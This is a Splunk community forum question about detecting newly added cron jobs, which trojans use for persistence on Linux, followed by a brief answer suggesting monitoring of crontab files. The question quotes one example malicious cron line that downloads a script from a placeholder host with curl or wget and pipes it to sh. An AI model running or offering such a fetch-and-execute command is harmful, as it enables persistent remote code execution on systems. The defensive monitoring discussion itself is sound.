Splunk Enterprise

how to use splunk monitor a cron job add action


when some Trojans or virus  are implanted in the Linux OS. it will add cron job to  persist the Trojans .

for example:





curl -fsSL https://xxxx.com/raw/sByq0rym ||wget -q -0- https://xxx.com/raw/sByq0rym)|sh





so, can I use splunk to monitor  newly added  cron job ?

Labels (1)
0 Karma

Super Champion

You can monitor crontab files and apply your logic to find new cron job added.

The below doc is helpful to find out cronjob location 


If this helps, give a like below.
0 Karma
Get Updates on the Splunk Community!

Splunk Forwarders and Forced Time Based Load Balancing

Splunk customers use universal forwarders to collect and send data to Splunk. A universal forwarder can send ...

NEW! Log Views in Splunk Observability Dashboards Gives Context From a Single Page

Today, Splunk Observability releases log views, a new feature for users to add their logs data from Splunk Log ...

Last Chance to Submit Your Paper For BSides Splunk - Deadline is August 12th!

Hello everyone! Don't wait to submit - The deadline is August 12th! We have truly missed the community so ...